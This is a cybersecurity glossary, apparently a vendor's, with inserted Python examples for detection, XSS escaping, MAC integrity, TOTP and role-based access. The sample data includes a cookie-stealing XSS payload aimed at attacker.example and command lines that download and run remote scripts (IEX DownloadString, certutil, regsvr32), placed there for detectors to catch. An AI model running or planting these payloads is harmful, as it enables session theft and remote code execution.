Access Control Security
A foundational security process that regulates who is allowed to access certain apps, data, and resources, and under what conditions.
Adware (advertising-supported software) is automated, unwanted software that monitors online user behavior and displays targeted advertisements, banners, and pop-ups. Sometimes used as spyware to collect user data for cybercriminals.
Unlike generative AI (GenAI), which requires prompts to get results, agentic AI is an autonomous system that uses tools (including GenAI) to perform tasks automatically, that is, with little or no human intervention. Agentic AI can independently set goals, plan multi-step processes, make decisions, and take actions to achieve objectives.
A phishing attack carried out via social networks such as LinkedIn, Facebook, Instagram, X (Twitter), and Snapchat.
Software that protects computers and networks from malicious software (malware) like viruses, ransomware, spyware, and worms.
A WatchGuard security service that controls access to applications by granting, denying, or limiting permissions based on a user’s department, role, and the time of day, enhancing security and operational efficiency.
A WatchGuard security service that detects and stops sophisticated attacks, including ransomware, zero-day threats, and other advanced malware, using cloud-based sandboxing with full-system emulation analysis to identify APT malware in files and email attachments that enter your network.
Ability of computer systems to perform tasks that usually require human intelligence, like learning, reasoning, problem-solving, perception, and decision-making, enabling machines to understand language, recognize patterns, and act autonomously to achieve goals.
The process of verifying the identity of a user, device, or system, using factors like passwords, biometrics, or security tokens before granting access. Authentication factors fall into three categories: something a person has (such as a key, badge, or token), something a person knows (such as a password, ID number, or mother's maiden name), or something a person is (face recognition, fingerprint, retina scan, etc.). Combining factors from different categories is what makes multi-factor authentication stronger than any single factor.
A hidden method, whether planned or an accidental design flaw, that allows stealthy entry into a network. Hackers can exploit vulnerabilities or install malicious software to create a backdoor, providing an entry point that bypasses security measures.
Collection of computers that are infected with small bits of code (bots) that allow a remote computer to control some or all of the functions of the infected machines. Typically used for disreputable purposes, such as denial of service attacks, click fraud, and spam.
A common practice whereby employees can use their personally owned devices, like smartphones, laptops, and tablets for work purposes rather than company-issued devices. Increases exposure to malware, data leakage, and credential theft.
These attacks involve spoofed or compromised email accounts used to manipulate normal business workflows and redirect funds. What makes BEC especially dangerous is that it often does not require malware. It relies on trust, timing, and persuasion.
Stands for Cloud Access Security Broker. A policy enforcement point that sits between users and cloud services and applies the organization's security policies to cloud usage: visibility into which SaaS apps are in use (including shadow IT), data protection, threat protection, and compliance controls. Commonly deployed as part of a zero trust or SASE architecture.
A type of attack in which the victim believes they are clicking on a known, trusted website, but the attacker has layered an invisible frame over decoy content so that the click actually lands on a hidden button or link, often on a trusted site where the victim is already logged in. Defended on the server side with framing restrictions (the X-Frame-Options header or the Content-Security-Policy frame-ancestors directive).
An attack that uses stolen username and password combinations from previous data breaches to attempt logins into other services. Since many people reuse passwords, attackers run automated tools that test millions of credential pairs against target websites.
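Added example (not from the original page, and not WatchGuard code): a Python sliding-window check over a constructed authentication log. It flags a source address that tries many different usernames in a short burst, which is the signature of a stuffing run walking a breach list, rather than one user retrying a mistyped password. The log format, the addresses and the thresholds are assumptions for this illustration.

```python
from collections import defaultdict

# Constructed sample authentication log (not from the original page):
# "<unix_time> <source_ip> <username> <result>"
SAMPLE_AUTH_LOG = """\
1700000000 203.0.113.7 alice FAIL
1700000001 203.0.113.7 bob FAIL
1700000002 203.0.113.7 carol FAIL
1700000003 203.0.113.7 dave FAIL
1700000004 203.0.113.7 erin FAIL
1700000005 203.0.113.7 frank SUCCESS
1700000010 198.51.100.4 alice FAIL
1700000020 198.51.100.4 alice FAIL
1700000030 198.51.100.4 alice SUCCESS
"""


def parse_auth_line(line):
    """Split one log line into (timestamp, source_ip, username, result)."""
    ts, ip, user, result = line.split()
    return int(ts), ip, user, result


def detect_credential_stuffing(log_text, window_seconds=60,
                               min_attempts=5, min_distinct_users=4):
    """Return {source_ip: summary} for IPs whose attempts inside any sliding
    window of window_seconds meet both thresholds.

    The distinct-user count is the discriminator: a stuffing tool walks a
    breach list (many usernames, one attempt each), whereas a user fumbling
    a password or a brute-force tool hammers one account repeatedly."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            ts, ip, user, result = parse_auth_line(line)
            events[ip].append((ts, user, result))

    findings = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # Advance the window start until the window fits in window_seconds.
            while evs[end][0] - evs[start][0] > window_seconds:
                start += 1
            in_window = evs[start:end + 1]
            users = {user for _, user, _ in in_window}
            if len(in_window) >= min_attempts and len(users) >= min_distinct_users:
                findings[ip] = {
                    "attempts": len(in_window),
                    "distinct_users": len(users),
                    # A success inside a stuffing burst identifies an account
                    # whose reused password was in the breach dump.
                    "successful_logins": sorted(
                        user for _, user, result in in_window if result == "SUCCESS"),
                }
    return findings


if __name__ == "__main__":
    for ip, summary in detect_credential_stuffing(SAMPLE_AUTH_LOG).items():
        print(ip, summary)
```

In the sample, 203.0.113.7 is flagged (six usernames in five seconds, one of them successful) while 198.51.100.4 is not, because three attempts on a single account is ordinary user behaviour. Accounts listed under successful_logins are the ones to force a password reset on.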
An attack carried out through the victim's web browser against a web application that echoes untrusted input into its pages without escaping it. For example, an attacker tricks a user into clicking a specially crafted, malicious hyperlink that appears to lead to an innocent site; the link carries script that the vulnerable site reflects back into the page, so it runs in the victim's browser with that site's privileges and can steal session cookies or act as the user.
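Added example (not from the original page, and not WatchGuard code) for this entry and for the clickjacking entry above: a deliberately vulnerable Python page-rendering function beside its escaped form, plus the response headers that limit the damage when escaping is missed and that stop the page from being framed. The payload, the attacker host and the header values are constructed for this illustration.

```python
import html

# Constructed attacker input (not from the original page): a script that
# sends the session cookie to an attacker-controlled host.
XSS_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def render_greeting_vulnerable(name):
    """Deliberately vulnerable: untrusted input is pasted into HTML as markup."""
    return f"<p>Hello, {name}!</p>"


def render_greeting_safe(name):
    """Escapes &, <, >, " and ' so the browser treats the input as text."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


def render_attribute_safe(value):
    """Attribute context: escaping is only sufficient when the attribute is quoted."""
    return f'<input type="text" value="{html.escape(value, quote=True)}">'


def contains_script_tag(rendered_html):
    """Crude check used here to show whether a payload survived as markup."""
    return "<script" in rendered_html.lower()


def security_headers():
    """Defense-in-depth response headers (values are assumptions for this example).
    script-src 'self' makes the browser refuse an injected inline <script> even
    if escaping is missed somewhere; frame-ancestors and X-Frame-Options stop
    the page being loaded in a hidden frame for clickjacking."""
    return {
        "Content-Security-Policy":
            "default-src 'self'; script-src 'self'; frame-ancestors 'none'",
        "X-Frame-Options": "DENY",
    }


if __name__ == "__main__":
    print(render_greeting_vulnerable(XSS_PAYLOAD))
    print(render_greeting_safe(XSS_PAYLOAD))
    print(security_headers())
```

Escaping must match the context the value lands in (HTML body, quoted attribute, JavaScript string, URL); html.escape covers the first two only, which is why a templating engine with automatic context-aware escaping is the usual production answer.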
Stands for Common Vulnerabilities and Exposures. A catalog of standardized identifiers (CVE IDs) for publicly known vulnerabilities and exposures. Essential for vulnerability management: a shared identifier lets companies match scanner output, vendor advisories, and patch notes to the same flaw, confirm they are not running affected software versions, and prioritize remediation.
A cyberattack is a deliberate attempt by an individual or group to compromise another party’s information system. Attackers typically aim to disrupt operations or gain unauthorized access to data for personal or organizational gain.
A type of insurance that limits a policy holder’s liability and manages recovery costs in the event of a cyberattack, data breach, or act of cyberterrorism. Insurance providers increasingly require core zero trust controls, including multi-factor authentication (MFA) and Endpoint Detection and Response (EDR), so a zero trust strategy makes it easier to obtain a policy and can lower premiums.
A hidden part of the Internet requiring special browsers like Tor to access. Designed for user anonymity through onion routing, used for both legitimate purposes (privacy, anti-censorship) and illicit activities (black markets, illegal services).
Tools that can scan stealer logs, criminal forums, and third-party breaches on the dark web for your organization's exposed passwords. By providing visibility into exposed corporate credentials, it enables faster response and risk mitigation.
A process of continually scanning the dark web to identify compromised, stolen, or leaked data. This can include intellectual property, credentials, and personal information.
The concept that you can discern whether data is in the condition its authors or owners intend it to be, and that it has not been modified by unauthorized persons during storage or transmittal.
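Added example (not from the original page, and not WatchGuard code): Python code contrasting an unkeyed hash with a keyed MAC over a constructed record. A plain hash detects accidental corruption, but an attacker who can change the data can recompute it; an HMAC with a key the attacker does not hold is what lets the receiver tell that the record is still as its owner intended. The key and record are assumptions for this illustration.

```python
import hashlib
import hmac

# Constructed example record and key (not from the original page).
KEY = b"shared-secret-key-from-a-kms"
RECORD = b'{"account":"1234","transfer_amount":100}'


def plain_digest(message):
    """Unkeyed hash: detects accidental corruption only."""
    return hashlib.sha256(message).hexdigest()


def verify_plain_digest(message, digest):
    return hmac.compare_digest(plain_digest(message), digest)


def mac_tag(message, key):
    """Keyed MAC: only a holder of the key can produce a valid tag."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def verify_mac(message, tag, key):
    # compare_digest runs in constant time, so the comparison does not leak
    # how many leading characters of the tag were correct.
    return hmac.compare_digest(mac_tag(message, key), tag)


def attacker_tamper(message):
    """An attacker on the wire changes the amount and recomputes the unkeyed
    hash. Without the key there is no way to recompute the MAC."""
    forged = message.replace(b'"transfer_amount":100', b'"transfer_amount":9000')
    return forged, plain_digest(forged)


if __name__ == "__main__":
    tag = mac_tag(RECORD, KEY)
    forged, forged_digest = attacker_tamper(RECORD)
    print("plain hash accepts forgery:", verify_plain_digest(forged, forged_digest))
    print("MAC accepts forgery:", verify_mac(forged, tag, KEY))
```

The same idea scaled up is a digital signature: a MAC proves the data came from someone holding the shared key, a signature proves it came from the holder of a private key and can be checked by anyone with the public key.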
A highly realistic, AI-generated image, video, or audio, created to convincingly impersonate someone or some event. In cybersecurity, deepfakes are used to trick users into taking an action, like redirecting funds or sharing confidential information.
A type of attack that attempts to make an online service unavailable by flooding the target with more requests than it can handle, usually from a single source.
A type of attack that attempts to make an online service unavailable by flooding the target with more requests than it can handle. Unlike a DoS attack that typically comes from a single source, in a DDoS attack attackers use multiple compromised devices to generate traffic from many sources simultaneously.
A technique that tricks a DNS server into believing it has received authentic information when, in reality, the information is false. Used to take unsuspecting victim to a malicious website.
An attack technique where a hacker intercepts a system's requests to a DNS server in order to issue false responses as though they came from the real DNS server.
A WatchGuard security service that blocks malicious DNS requests, redirects users to a secure, informative page, and promotes best security practices to prevent phishing attacks and reduce malware infections.
The gathering and publication of personal information like addresses and phone numbers by hostile parties to try to intimidate or harass someone.
Traffic that moves between two or more machines across the same data center, including server-to-server communication or between individual devices.
Any attempt to gain greater permissions illicitly (typically, by impersonating a privileged user or otherwise bypassing normal authentication) within a computer system is considered an elevation of privilege.
Many endpoint security systems have multiple agents (lightweight services that run in the background to automate monitoring and control). A more secure, modern approach is to have a single agent that drives your entire security ecosystem, leading to decreased CPU load, bandwidth use, and operational complexity.
A security solution that continuously monitors endpoint devices for threats such as ransomware, fileless attacks, zero-day malware, and phishing. Using AI and machine learning, EDR collects endpoint data, analyzes behavior, and enables automated or manual responses to stop threats before they spread.
A cloud-native security solution that centralizes next-generation antivirus with self-learning, AI-powered analytics for Windows, macOS, and Linux desktops, laptops, and servers. Goes beyond signature-based antivirus, using behavioral analytics to stop malware, ransomware, and zero-day threats that traditional solutions miss.
A security solution that combines Endpoint Protection Platform (EPP) technologies, advanced Endpoint Detection and Response (EDR), and self-learning AI-powered agents and services to protect computers, laptops, and servers from threats invisible to traditional solutions.
A wireless access point masquerading as a trusted wireless network, used to trick users into connecting to attacker's network, where they can steal passwords or other sensitive information by either intercepting unencrypted HTTP traffic or using their control of network traffic to run convincing phishing attacks.
An alert that incorrectly flags legitimate activity or files as malicious threats. Can be caused by overly sensitive monitoring tools or misconfigured rules.
A type of cyberattack that uses legitimate, built-in system tools (like PowerShell, WMI) and resides in computer memory (RAM) instead of writing malicious files to the hard drive. Extremely difficult for traditional, file-scanning antivirus software to detect. Closely related to living-off-the-land (LotL) attacks, which abuse the same built-in tools whether or not anything is written to disk.
WatchGuard's flagship NGFW firewall. Known for delivering the indispensable balance of performance, low total cost of ownership (TCO), and simplicity that empowers businesses to grow with confidence. Available in both tabletop and rackmount appliances, virtual FireboxV solutions, and Firebox Cloud.
A network security device that inspects incoming and outgoing traffic, blocking or allowing traffic based on configurable security rules. Firewalls have long been considered a network's first line of defense against unwanted, dangerous traffic.
A cloud-based firewall solution that provides network security capabilities through a subscription model, so there is no need to pay for and maintain physical, on-premises equipment. This allows companies to simplify their network architecture while scaling security.
A signature-based WatchGuard security service that detects and blocks known spyware, viruses, trojans, worms, rogueware, and complex threats.
A type of artificial intelligence (AI) that can generate high-quality text, images, and other content based on massive amounts of data it has been trained on. Relies on human or non-human prompts to begin the creation process. ChatGPT is an example of a popular GenAI tool.
A unified architectural framework that integrates disparate identity and access management tools to act as a single unified system, giving organizations a centralized approach for managing digital identities in complex IT environments.
Attacks that focus on stealing or guessing valid user credentials to bypass security perimeters. Once attackers obtain legitimate credentials, they appear as authorized users and can move through systems without triggering many security alerts.
Stands for Identity Provider. Acts as a central authority to verify users and grant secure access to applications, often through single sign-on (SSO) and multi-factor authentication (MFA). By creating, maintaining, and managing digital identities, it protects against unauthorized access by centralizing identity management and enforcing strong authentication.
A proactive, real-time behavioral indicator, like suspicious admin activity, abnormal user behavior, or privilege escalation, that reveals an attack is in progress.
A digital clue that helps security teams detect, investigate, and respond to malicious activity that has already taken place on a network or endpoint. Clues include a suspicious IP address, file hash, or unusual inbound and outbound network traffic.
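Added example (not from the original page, and not WatchGuard code): a Python IoC sweep over constructed JSON-lines telemetry. It matches destination addresses against single-IP and CIDR indicators and file hashes against a hash list, normalizing case so a differently-cased hash still matches. The indicators use RFC 5737 documentation addresses and a placeholder hash, so nothing in it is a real indicator.

```python
import ipaddress
import json

# Constructed indicators (not from the original page). RFC 5737 documentation
# addresses and a placeholder hash are used so none of these are real.
IOC_IPS = {"203.0.113.66"}
IOC_NETWORKS = [ipaddress.ip_network("198.51.100.0/24")]
IOC_SHA256 = {"f" * 64}

# Constructed endpoint and network telemetry as JSON lines.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ts": "2024-05-01T10:00:01Z", "host": "ws-12", "event": "net_connect", "dst_ip": "203.0.113.66"},
    {"ts": "2024-05-01T10:00:02Z", "host": "ws-12", "event": "file_write", "sha256": "F" * 64},
    {"ts": "2024-05-01T10:00:03Z", "host": "srv-01", "event": "net_connect", "dst_ip": "198.51.100.77"},
    {"ts": "2024-05-01T10:00:04Z", "host": "srv-01", "event": "net_connect", "dst_ip": "192.0.2.10"},
    {"ts": "2024-05-01T10:00:05Z", "host": "ws-12", "event": "dns_query", "query": "updates.example.net"},
])


def match_iocs(jsonl_text):
    """Return one (host, event, indicator_type, indicator) tuple per IoC hit."""
    hits = []
    for line in jsonl_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        dst = ev.get("dst_ip")
        if dst:
            try:
                addr = ipaddress.ip_address(dst)
            except ValueError:
                continue  # malformed address; skip rather than crash the sweep
            if dst in IOC_IPS:
                hits.append((ev["host"], ev["event"], "ip", dst))
            for net in IOC_NETWORKS:
                if addr in net:
                    hits.append((ev["host"], ev["event"], "cidr", str(net)))
        digest = ev.get("sha256", "").lower()  # hashes are case-insensitive hex
        if digest in IOC_SHA256:
            hits.append((ev["host"], ev["event"], "sha256", digest))
    return hits


if __name__ == "__main__":
    for hit in match_iocs(SAMPLE_EVENTS):
        print(hit)
```

Indicator matching is only as good as the feed and decays quickly (attackers rotate IPs and recompile binaries), which is why IoC sweeps are paired with the behavioral indicators of attack described in the entry above.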
A cybercriminal who specializes in gaining unauthorized access to computer networks and systems, then selling that access to other criminals. IABs are part of the Ransomware-as-a-Service economy.
A WatchGuard security service that automates malware discovery and classifies current and future threats in mere seconds with AI-powered intelligence.
An AI tool trained on massive data sets of language to understand and generate human-like text. Capable of processing written instruction via human or non-human prompts, then responding in conversational language to create fresh content and answer complex questions.
Fundamental security policy that only allows users, applications, or systems to have the absolute minimum permissions needed to perform their specific tasks, and nothing more. Prevents lateral movement and minimizes access to sensitive data by enforcing strict access controls and role-based permissions.
A fileless malware cyberattack technique in which hackers use legitimate, native operating system tools and features like scripts, admin tools, or scheduled tasks, to conduct malicious activities. They avoid detection by blending in with normal system operations.
Legitimate processes and services that Windows uses to perform certain tasks can be hijacked by attackers for malicious purposes. They are effective because these are trusted process names and binaries that look non-malicious.
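Added example (not from the original page, and not WatchGuard code) for the fileless, living-off-the-land and hijacked-Windows-binary entries above: Python detection rules run over constructed process-creation events. Because the binaries themselves are trusted, the rules look at context (an Office application spawning a shell, certutil fetching from a URL, regsvr32 loading a remote script) and decode the base64 UTF-16LE argument of PowerShell's -EncodedCommand to reveal what it hides. Hosts, addresses and command lines are assumptions for this illustration.

```python
import base64
import binascii

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed plaintext for the encoded-PowerShell sample (not from the page).
HIDDEN_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
# powershell -EncodedCommand takes base64 of the UTF-16LE script text.
ENCODED = base64.b64encode(HIDDEN_COMMAND.encode("utf-16le")).decode()

# Constructed process-creation telemetry (not from the original page).
SAMPLE_PROCESS_EVENTS = [
    {"host": "ws-07", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": f"powershell.exe -NoP -W Hidden -enc {ENCODED}"},
    {"host": "ws-07", "parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.5/x.txt x.txt"},
    {"host": "srv-02", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1"},
    {"host": "ws-09", "parent": "svchost.exe", "image": "regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://203.0.113.5/a.sct scrobj.dll"},
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the plaintext of a -e/-ec/-enc/-EncodedCommand argument, or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lower().lstrip("-/")
        # PowerShell accepts any unambiguous prefix of EncodedCommand, plus -ec.
        # -ExecutionPolicy is not a prefix of it, so it is not mistaken here.
        if tok.startswith(("-", "/")) and flag and (flag == "ec" or "encodedcommand".startswith(flag)):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def analyze_process_events(events):
    """Return (host, rule, detail) findings for LotL-style behaviour."""
    findings = []
    for ev in events:
        parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
        lower = cmd.lower()
        if parent in OFFICE_APPS and image in SHELLS:
            findings.append((ev["host"], "office_app_spawned_shell", f"{parent} -> {image}"))
        if image in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                findings.append((ev["host"], "encoded_powershell", decoded))
        if image == "certutil.exe" and ("-urlcache" in lower or "-decode" in lower):
            findings.append((ev["host"], "certutil_download_or_decode", cmd))
        if image in ("regsvr32.exe", "mshta.exe", "rundll32.exe") and "http" in lower:
            findings.append((ev["host"], "lolbin_remote_script", cmd))
    return findings


if __name__ == "__main__":
    for finding in analyze_process_events(SAMPLE_PROCESS_EVENTS):
        print(finding)
```

The srv-02 event (an administrator running a signed backup script) produces no finding, which is the point of parent-child and argument rules: the binary is never the signal, the way it is used is.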
Technologies based on algorithms that can learn from data, enabling systems to identify patterns, make decisions, and improve themselves through experience and data.
Online advertisements that carry embedded malware or redirect the viewer to a site that pushes a malicious download (often a drive-by download that needs no click at all). Because ads are served through third-party ad networks, a malicious ad can appear on a legitimate, trusted website without that site itself being compromised.
A broad term for any software designed to damage, disrupt, or gain unauthorized access to computers, networks, or data. Includes ransomware, viruses, spyware, and much more. Because malware is constantly evolving and increasingly dangerous, modern cybersecurity requires multi-layered defensive tools that include Zero Trust Network Access, Managed Detection and Response, and Endpoint Detection and Response.
Type of cyberattack where attackers secretly insert themselves into the communication channel established between two legitimate parties to read, intercept, or even manipulate the data traffic.
A fully managed cybersecurity service that continuously monitors your IT environment, including endpoints, networks, cloud applications, and user accounts, to detect and stop threats before they cause harm. Unlike traditional tools, which only alert users to possible issues, MDR combines advanced AI-driven analytics and human expertise to investigate and respond to attacks in real time.
A third-party company that remotely manages a customer’s IT infrastructure and end user systems, typically based on a subscription model with a service level agreement (SLA). Sometimes referred to as a Managed Security Service Provider (MSSP) when the provided services are specifically focused on cybersecurity needs.
A not-for-profit organization that operates federally funded research and development centers to support US government agencies in cybersecurity, defense, aviation, and healthcare. MITRE ATT&CK® Evaluations are widely trusted for their transparency and rigor, offering a detailed look at how endpoint security solutions behave during real-world attack scenarios.
A framework that categorizes cybercriminal tactics, techniques, and procedures (TTPs) across the attack lifecycle. It is used by security teams to model, detect, and prevent attacks. MITRE publishes the ATT&CK Evaluations results without scores or rankings, so vendor and third-party analyses, comparisons, and guidance are useful for interpreting them.
An authentication method that requires the user to provide two or more verification factors, such as a password, token, and fingerprint, to gain access to a resource such as an application, online account, or VPN.
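Added example (not from the original page, and not WatchGuard code): a Python implementation of the time-based one-time password (TOTP, RFC 6238) that authenticator apps generate as the "something you have" factor, plus a verifier that tolerates one step of clock drift and compares in constant time. The secret is the RFC 6238 reference test secret, not a real key, which is what lets the results be checked against the RFC's published vectors.

```python
import hashlib
import hmac
import struct
import time

# RFC 6238 reference secret (ASCII "12345678901234567890"); not a real key.
RFC6238_SECRET = b"12345678901234567890"


def hotp(key, counter, digits=6, digestmod=hashlib.sha1):
    """RFC 4226 HOTP: dynamically truncate HMAC(key, counter) to a decimal code."""
    mac = hmac.new(key, struct.pack(">Q", counter), digestmod).digest()
    offset = mac[-1] & 0x0F
    code = ((mac[offset] & 0x7F) << 24 | mac[offset + 1] << 16
            | mac[offset + 2] << 8 | mac[offset + 3])
    return str(code % 10 ** digits).zfill(digits)


def totp(key, unix_time, step=30, digits=6, digestmod=hashlib.sha1):
    """RFC 6238 TOTP: HOTP with the counter derived from the current time step."""
    return hotp(key, int(unix_time) // step, digits, digestmod)


def verify_totp(key, submitted, unix_time=None, step=30, digits=6, window=1):
    """Accept the code for the current step or up to `window` steps either side,
    to absorb clock drift between the server and the user's device.
    hmac.compare_digest keeps the comparison constant-time."""
    now = int(time.time()) if unix_time is None else int(unix_time)
    counter = now // step
    for delta in range(-window, window + 1):
        if hmac.compare_digest(hotp(key, counter + delta, digits), submitted):
            return True
    return False


if __name__ == "__main__":
    # RFC 6238 Appendix B vector: time 59 with SHA-1 and 8 digits is 94287082.
    print(totp(RFC6238_SECRET, 59, digits=8))
    print(totp(RFC6238_SECRET, int(time.time())))
```

Two things a real deployment adds: each accepted code is recorded so it cannot be replayed inside its window, and attempts are rate-limited, because a six-digit code with a three-step window is only about 300,000 guesses away from a lucky hit.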
Provides continuous, real-time monitoring and analysis of network traffic to detect, investigate, and stop malicious threats. Can be deployed as an appliance or through the cloud. Advantage of cloud-native NDR: no new hardware to manage, no sensors, no packet capture infrastructure, eliminating cost and complexity of hardware-based NDR.
A WatchGuard security service that generates a visual map of all nodes on your network, ensuring only authorized devices are connected while detecting all open ports and protocols.
Uses AI, machine learning, and behavioral analysis that is not available in traditional antivirus solutions to proactively detect and stop known and unknown threats. Goes beyond traditional signature-based methods to catch modern malware, ransomware, and fileless attacks before they cause damage.
A network security device that provides capabilities beyond a traditional, stateful firewall, including additional features like application awareness and control, integrated intrusion prevention, and cloud-delivered threat intelligence.
Traffic that moves between an organization's network perimeter and the outside world (e.g., the Internet, a user's device). See East/West Traffic.
Stands for OpenID Connect. An identity authentication protocol layered on OAuth 2.0 that lets an application (the relying party) verify a user's identity through an identity provider and receive basic profile information in a signed ID token, without ever handling the user's credentials. Widely used for single sign-on between unrelated applications.
A passwordless authentication credential, based on the FIDO2/WebAuthn standards, that lets users sign in to apps and websites with biometrics (fingerprint, face scan) or a device PIN instead of a password. The private key never leaves the device and each credential is bound to the site it was created for, so there is no password to forget, no one-time code to intercept, and a look-alike phishing site cannot use it. Passkeys work like unlocking your phone, the same fingerprint or face, but now also for logging into apps, and give MSPs a way to offer phishing-resistant authentication.
The process of applying vendor-issued updates to close security vulnerabilities and optimize the performance of software and devices. The best patch management services detect missing patches, outdated or EOL software, and known CVEs, then correlate that data with risk severity to help teams prioritize remediations.
A social engineering attack in which the attacker tries to trick the victim into giving up sensitive information by masquerading as a trusted entity.
Programs that are not classified as malware but behave abnormally or are corrupted. The vast majority of PUPs are AutoKMS tools, hacking tools, and adware.
Stands for Professional Services Automation. The core business and operations platform for an MSP delivering managed services. It brings together the service desk and ticketing, time and expense tracking, project management, contracts and SLAs, billing and invoicing, procurement, and reporting in one system, ensuring work is captured, managed, and billed consistently end-to-end.
Malware originally used to extort money from victims by encrypting or otherwise blocking access to applications or files until a sum of money is paid. Today, attackers more often also steal information first and threaten to make it public. For protection, Zero Trust Network Access (ZTNA) helps ensure that even if credentials are compromised, attackers cannot automatically reach accounts, sensitive information, or critical services.
A cybercrime business model in which ransomware developers sell or lease ransomware code and tooling so that even inexperienced hackers can launch attacks using sophisticated tools.
A type of malware that grants an attacker covert, administrative-level control over an infected device from a remote location. Acts as a backdoor that allows threat actors to maintain persistence on a victim's computer and potentially load other malware or run malicious commands.
The technology IT and MSPs use to centrally monitor, secure, and maintain networks, servers, and devices (endpoints). Modern RMM solutions support both on-premises and cloud infrastructure monitoring and remote smart device management to improve efficiency and cost.
A WatchGuard security service providing cloud-based web reputation service that aggregates data from multiple feeds to provide real-time protection from malicious sites and botnets.
An unauthorized wireless access point installed on a secure network. Rogue access points increase the attack surface of a network and can potentially allow an attacker to obtain network access without being physically present in the building.
A security model that limits access to a computer network or system based on the user's role within an organization.
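Added example (not from the original page, and not WatchGuard code) for this entry and for the least-privilege entry above: a Python role-based access check that denies by default, plus a least-privilege audit that compares the permissions each user holds with the ones they actually exercised in an access log, so over-broad roles can be tightened. Roles, users, permission names and the usage log are assumptions for this illustration.

```python
# Constructed role and user tables (not from the original page).
ROLE_PERMISSIONS = {
    "viewer":  {"report:read"},
    "analyst": {"report:read", "alert:read", "alert:ack"},
    "admin":   {"report:read", "alert:read", "alert:ack", "user:create", "policy:write"},
}
USER_ROLES = {
    "alice": {"analyst"},
    "bob":   {"viewer"},
    "carol": {"admin"},
}

# Constructed audit trail of (user, permission actually exercised).
SAMPLE_USAGE = [
    ("alice", "alert:read"), ("alice", "alert:ack"), ("alice", "report:read"),
    ("bob", "report:read"),
    ("carol", "report:read"), ("carol", "alert:read"),
]


def permissions_for(user):
    """Union of the permissions of the user's roles. An unknown user or an
    unknown role contributes nothing, so there is no implicit access."""
    perms = set()
    for role in USER_ROLES.get(user, ()):
        perms |= ROLE_PERMISSIONS.get(role, set())
    return perms


def is_allowed(user, permission):
    """Deny by default: only an explicit grant returns True."""
    return permission in permissions_for(user)


def unused_grants(usage_log):
    """Least-privilege audit: permissions each user holds but never exercised.
    The result lists candidates for moving the user to a narrower role."""
    used = {}
    for user, perm in usage_log:
        used.setdefault(user, set()).add(perm)
    return {user: sorted(permissions_for(user) - used.get(user, set()))
            for user in USER_ROLES}


if __name__ == "__main__":
    print(is_allowed("alice", "alert:ack"), is_allowed("bob", "alert:ack"))
    print(unused_grants(SAMPLE_USAGE))
```

In the sample, carol holds admin but has only ever read reports and alerts, so the audit lists alert:ack, policy:write and user:create as grants to review. That gap between granted and used is exactly what an attacker with her credentials would exploit for lateral movement.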
SAML (Security Assertion Markup Language) is an open-standard, XML-based protocol used for exchanging authentication and authorization data between parties, primarily to enable single sign-on (SSO).
Stands for Software-Defined Wide Area Network. A virtualized approach to managing wide area networks. It connects users, offices, and remote sites to applications across multiple transport types. It centralizes control, allowing for dynamic traffic steering, automated routing, and improved agility for cloud-based applications.
A cloud-based framework that converges networking (like SD-WAN) and security functions (like Secure Web Gateway, CASB, Firewall as a Service, Zero Trust Network Access) into a single, unified service to securely connect users, devices, and applications anywhere.
A cybersecurity solution that filters Internet traffic between users and the web. When a user tries to visit a website, their request is first sent to the SWG, which checks the request against defined policies based on corporate and regulatory requirements. SWGs are insufficient as stand-alone solutions and need to be part of a larger, layered, zero trust defense strategy.
A security team that acts as an organization's central command, monitoring and defending its entire IT infrastructure. High costs, complexity, and staff-intensive requirements make deploying an internal SOC unrealistic for all but the largest enterprises. Managed service providers (MSPs) are key to providing critical SOC services for smaller and mid-market businesses.
A cloud-based model that converges key security services like (ZTNA, SWG, CASB) to secure access to web, cloud, and private applications, crucial for hybrid work and cloud environments. Protects users, devices, and data regardless of location, and is considered a security component of the broader SASE framework.
Devices and unapproved SaaS apps that employees install and use for work without the knowledge or approval of IT. Increases data exposure and leaves those assets outside patching, backup, and security monitoring.
Stands for Security Information and Event Management. Provides real-time analysis of security alerts from applications and network hardware. The main downsides of SIEM products are their complexity and high cost, leading to difficult setup, alert fatigue, significant resource needs (expertise, hardware), and long deployment times. For MSPs and lean IT teams, XDR is often the more practical choice.
Ability to identify threats by comparing system activity to a database of known attack patterns (signatures) to detect malicious behavior. The weakness of signature-based detection is that modern threats mostly rely on techniques that are not recognized by signatures alone.
An authentication method in which one login (typically with username and password) allows access to multiple applications and services, providing convenience for users and better and centralized oversight for IT teams.
Stands for Security Orchestration, Automation, and Response. A technology that unifies security tools, automates repetitive tasks, and orchestrates incident response workflows to help security teams manage threats more efficiently, reducing manual effort and improving response times.
An attack that psychologically manipulates people into clicking malicious links, opening infected attachments, or revealing passwords. Particularly effective because it targets the human element, bypassing firewalls and other security mechanisms.
A cloud-based model where software applications are delivered over the Internet, typically via a web browser, on a subscription basis, with the provider managing all underlying infrastructure, maintenance, and updates.
WatchGuard security service that provides real-time, continuous, and highly reliable protection from spam and phishing attempts.
